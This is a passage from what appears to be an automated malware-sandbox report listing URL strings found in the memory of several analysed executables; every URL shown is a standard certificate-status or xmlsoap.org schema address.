Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net02
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9L
Source: RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9Y
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
